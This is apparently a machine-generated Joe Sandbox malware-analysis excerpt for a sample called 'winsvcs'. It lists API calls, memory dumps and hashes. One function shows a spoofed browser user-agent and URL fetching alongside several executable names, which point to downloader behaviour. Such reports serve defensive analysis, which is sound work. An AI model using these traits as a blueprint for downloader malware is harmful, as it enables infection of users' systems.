                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00414176
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00414184
                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 004141B7
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00414206
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00414214
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00414220
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00414263
                                                                                                                                                                                                                          • GetClassNameA.USER32(00000000,?,00000008), ref: 00414271
                                                                                                                                                                                                                          • lstrcmp.KERNEL32(?,0043ACB4), ref: 00414281
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0041428D
                                                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 00414297
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004143A9
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004143C4
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 004143D5
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004143E7
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0041444B
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0041445D
                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00414471
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004144B1
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004144BC
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,8007000E), ref: 004145A3
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,-0000000E), ref: 004145B0
                                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004145D1
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 004145E2
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 004146A8
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 004146B6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$Variant$Clear$AllocColorGlobal$CacheClassCurrentFlushInitInstructionNameParentProcessString_memcpy_slstrcmplstrlen
                                                                                                                                                                                                                          • String ID: 4D
                                                                                                                                                                                                                          • API String ID: 1879328196-4064760932
                                                                                                                                                                                                                          • Opcode ID: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
                                                                                                                                                                                                                          • Instruction ID: d33cbc65b261bd5f71919fcd58597f20de14d50e8eab0a0e342eb175f4602f49
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8be03a5f09f7f15d92ddf33614990a82e1b2fd86bda88db0956c22b7c2213bd8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99028C71204205AFDB10CF24D848BABBBE5BF85714F14862AF859DB2A0D778DD81CB5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000001,00000000,00000000,00000000), ref: 0040168A
                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(?,vG@,00000000,00000000,00000000,00000000), ref: 004016AB
                                                                                                                                                                                                                          • PathFindFileNameA.SHLWAPI(?), ref: 004016C1
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 00401748
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 004017C2
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040183C
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 004018B6
                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040193F
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00401948
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00401951
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00401CC7
                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00401CD0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$HttpInfoQuery$CloseHandle$Open$FileFindNamePath
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0$m.exe$m.exe$o.exe$o.exe$p.exe$p.exe$s.exe$s.exe$t.exe$t.exe$vG@
                                                                                                                                                                                                                          • API String ID: 37956365-2170266109
                                                                                                                                                                                                                          • Opcode ID: d811898af9405caae475fb2c357d6a7e46e2496191ffd16bc4c9c98ebedf9716
                                                                                                                                                                                                                          • Instruction ID: fb553488e42a15cb40c77f0b723d3c996e8af59fc795cfdcf88d4fc03e82c5ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d811898af9405caae475fb2c357d6a7e46e2496191ffd16bc4c9c98ebedf9716
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3224974D042989FDF21CFA8C844BEDBBB1AB16314F1441EAD099B72A1D3785E89CF19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00420FE0
                                                                                                                                                                                                                          • GetClipBox.GDI32(00000000,?), ref: 00421001
                                                                                                                                                                                                                          • LPtoDP.GDI32(?,?,00000002), ref: 0042101C
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00421047
                                                                                                                                                                                                                          • DPtoLP.GDI32(?,?,00000002), ref: 00421058
                                                                                                                                                                                                                          • SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042106C
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000001,00000001), ref: 00421078
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042108A
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004210AA
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004210BA
                                                                                                                                                                                                                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004210D9
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004210E8
                                                                                                                                                                                                                            • Part of subcall function 004212B0: GetClipBox.GDI32(?,?), ref: 004212DA
                                                                                                                                                                                                                            • Part of subcall function 004212B0: SetBkColor.GDI32(?,00000001), ref: 0042132A
                                                                                                                                                                                                                            • Part of subcall function 004212B0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
                                                                                                                                                                                                                            • Part of subcall function 004212B0: SetBkColor.GDI32(?,00000000), ref: 00421367
                                                                                                                                                                                                                            • Part of subcall function 004212B0: DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
                                                                                                                                                                                                                            • Part of subcall function 004212B0: OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
                                                                                                                                                                                                                          • GetScrollPos.USER32(?,00000001), ref: 0042111F
                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,00000000), ref: 00421132
                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 004211D9
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004211F6
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000000), ref: 00421201
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042124D
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0042125C
                                                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 0042127F
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0042128E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$ColorRectSelect$Offset$ClipDeleteModePaintText$BeginClientDrawEdgeScrollWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2062583074-0
                                                                                                                                                                                                                          • Opcode ID: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
                                                                                                                                                                                                                          • Instruction ID: 7b82af6886746e71b5745f1b2fbacf292f59da6906099b940e92044999803834
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec85c6e82aff167f2083857f057e1339e9b95314912dc071d4e8745be6dab08f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5991C271508340EFDB218F65DD48BABBBF6FB88740F10892DFA9982260CB719854DF56
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00410CAC
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00410CBA
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00410CD3
                                                                                                                                                                                                                            • Part of subcall function 00423370: RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
                                                                                                                                                                                                                            • Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
                                                                                                                                                                                                                            • Part of subcall function 00423370: LoadCursorA.USER32(00000000,00007F00), ref: 00423402
                                                                                                                                                                                                                            • Part of subcall function 00423370: RegisterClassExA.USER32(00000030), ref: 00423425
                                                                                                                                                                                                                            • Part of subcall function 00423370: __recalloc.LIBCMT ref: 00423479
                                                                                                                                                                                                                            • Part of subcall function 00423370: GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(0044B30C,00000081,00000005), ref: 00410CEC
                                                                                                                                                                                                                          • FindResourceA.KERNEL32(0044B30C,00000081,000000F0), ref: 00410D07
                                                                                                                                                                                                                          • LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D13
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410D1A
                                                                                                                                                                                                                          • LoadResource.KERNEL32(0044B30C,00000000), ref: 00410D28
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410D37
                                                                                                                                                                                                                          • DialogBoxIndirectParamA.USER32(0044B30C,00000000,?,00411A10,00000000), ref: 00410D5C
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410D71
                                                                                                                                                                                                                          • GlobalHandle.KERNEL32(00000000), ref: 00410D7E
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00410D85
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 00410DA3
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410DAB
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00410DBA
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00410DD4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$ErrorLast$ClassCriticalLoadRegisterSection$ClipboardEnterFindFormatGlobalInfoLock$CurrentCursorDialogExceptionFreeHandleIndirectLeaveParamRaiseThread__recalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 825656904-0
                                                                                                                                                                                                                          • Opcode ID: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
                                                                                                                                                                                                                          • Instruction ID: f745feaec7197e157a37296f2868a76793427c604a9b77b08ca0e5f371f76add
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98cdc27012987dc8b331fe24380fde3fdf6c86d6618c04e7bde9161e2c43ec2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A631D835241700BBD7201BB5BC8CAAB3B58EB49721B141A76FD11C2391DBF8DCC1866D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00423381
                                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(0043AB60), ref: 0042338C
                                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(0043AB70), ref: 0042339C
                                                                                                                                                                                                                          • GetClassInfoExA.USER32(0043ACBC,00000030), ref: 004233BF
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423402
                                                                                                                                                                                                                          • RegisterClassExA.USER32(00000030), ref: 00423425
                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 00423479
                                                                                                                                                                                                                          • GetClassInfoExA.USER32(0043ACC8,00000030), ref: 004234D9
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 0042351E
                                                                                                                                                                                                                          • RegisterClassExA.USER32(00000030), ref: 00423541
                                                                                                                                                                                                                          • __recalloc.LIBCMT ref: 00423587
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 004235C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClassRegister$ClipboardCriticalCursorFormatInfoLoadSection__recalloc$EnterLeave
                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                          • API String ID: 664480883-4108050209
                                                                                                                                                                                                                          • Opcode ID: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
                                                                                                                                                                                                                          • Instruction ID: 40b37d6fc815d34b22f1382bcbd39b080c0c3bcab1dcc9cb4347d5ed29d7557a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf02972261f026e4bcbec7c13d29e9c08f259911210233a727ece19897c21767
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D61AFB0A043419BD711CF16E884A1ABBF5FF95715F90452EE89483360E7B8CA85CB8E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0041FF6D
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0041FFB8
                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041FFD4
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0041FFFA
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0042002D
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00420065
                                                                                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 00420084
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000424), ref: 004200B0
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004200BB
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004200EC
                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00420124
                                                                                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 00420143
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000610), ref: 0042016F
                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0042017A
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004201AB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ObjectSelect$DecrementInterlocked$DrawEmptyRectText$Delete
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1261204413-0
                                                                                                                                                                                                                          • Opcode ID: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
                                                                                                                                                                                                                          • Instruction ID: 0d3b065532d34c83c141dc093bc01bf73ec72bfda3dbf1df21a0141086e03954
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45ebfb616250f77b699904baf38d30cdf4aff1f93c6dffa9c54199414b70fd65
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CB19B71604304EFDB00CF64E888A6ABBF5FF88304F448A6AF9498B221D775DD55CB5A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClipBox.GDI32(?,?), ref: 004212DA
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000001), ref: 0042132A
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0042133F
                                                                                                                                                                                                                          • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0042135B
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00421367
                                                                                                                                                                                                                          • DrawEdge.USER32(?,?,00000008,00004009), ref: 00421385
                                                                                                                                                                                                                          • OffsetRect.USER32(00000010,00000003,?), ref: 004213CD
                                                                                                                                                                                                                          • DrawFrameControl.USER32(?,00000004,00000004,?), ref: 004213F0
                                                                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 00421461
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 004214CC
                                                                                                                                                                                                                          • DrawTextA.USER32(?,?,000000FF,?,00000010), ref: 0042154A
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00421567
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004215F2
                                                                                                                                                                                                                          • DrawFocusRect.USER32(?,?), ref: 0042160D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$Text$Draw$Rect$ClipControlCopyEdgeFocusFrameOffset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2048994688-0
                                                                                                                                                                                                                          • Opcode ID: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
                                                                                                                                                                                                                          • Instruction ID: d2e7032c405a87bda436ebbee9352e43b21f8cfe9bd8d6afaaa75e2085407c70
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 200927e29ddfe15c49f7e4c72c99c9c384ca24b6296100b23b26864b53e959f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CC12775604205DFDB04CF18D884A6ABBF6FF88310F588A69F8898B3A5D770ED44CB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep$_snprintfmemset$CreateThread
                                                                                                                                                                                                                          • String ID: %s%s$x
                                                                                                                                                                                                                          • API String ID: 3185671098-918306452
                                                                                                                                                                                                                          • Opcode ID: a93d2bdf82d10181dcb0b99582e3ceae6b68c2e042649301b690d65ecbcae48f
                                                                                                                                                                                                                          • Instruction ID: 53edad24388d98d4bc92df8c35b0c357ffc742b0aeb58214580d6d560269df2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a93d2bdf82d10181dcb0b99582e3ceae6b68c2e042649301b690d65ecbcae48f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C2183B1A40298AFDB109B91ED46FD97278AB05700F4004B6F249F60C1D7B85AD4CF19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(00136788,?,00000000,?,00135518), ref: 0041A7D0
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A7E8
                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A83B
                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A881
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A89E
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(0043AC38), ref: 0041A8D1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,0043AC48), ref: 0041A8E1
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A91D
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A937
                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(00136788,?), ref: 0041A956
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A96C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Enum$AddressDeleteHandleModuleOpenProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2624191705-0
                                                                                                                                                                                                                          • Opcode ID: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
                                                                                                                                                                                                                          • Instruction ID: 83ba429f44283625fc5b112b12f706557ec537738ca58ebf2211737b90b5b4cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C51A375A05348AFD7359F25DC44BEB77F8FB89354F00482AF98882250D7B48D94CBA6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00401DB1
                                                                                                                                                                                                                          • CoCreateInstance.OLE32(004051FC,00000000,00000001,004051EC,?), ref: 00401DC9
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401DE0
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401E1B
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401E32
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00401E71
                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00401E8D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitVariant$CreateInitializeInstanceSleepUninitialize
                                                                                                                                                                                                                          • String ID: )4@$p=Dv
                                                                                                                                                                                                                          • API String ID: 4283135408-2396073130
                                                                                                                                                                                                                          • Opcode ID: e1bc4a2e85860f621d4fc2f96366de4be55791a67befecc08ac8998583c24772
                                                                                                                                                                                                                          • Instruction ID: 208c781282a30cfd99823755e06e75eb4e8dd7f2476d9e837450959f1c20ea48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1bc4a2e85860f621d4fc2f96366de4be55791a67befecc08ac8998583c24772
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4931D035900608AFDB01DFA8D949BCEBBB9EF0D320F504066E901FB2A0D7B1A9448F64
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,004423C0,0000000C,00428325,00000000,00000000), ref: 004281FC
                                                                                                                                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 00428207
                                                                                                                                                                                                                            • Part of subcall function 0042AD25: Sleep.KERNEL32(000003E8,00000000,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD31
                                                                                                                                                                                                                            • Part of subcall function 0042AD25: GetModuleHandleW.KERNEL32(?,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD3A
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00428262
                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(004491E8), ref: 0042826F
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00428283
                                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 004282A1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                          • String ID: KERNEL32.DLL
                                                                                                                                                                                                                          • API String ID: 4021795732-2576044830
                                                                                                                                                                                                                          • Opcode ID: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
                                                                                                                                                                                                                          • Instruction ID: 71b69992fdd27ed05a877e38898eabb59d78cf734761bb36ba796b392924f269
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
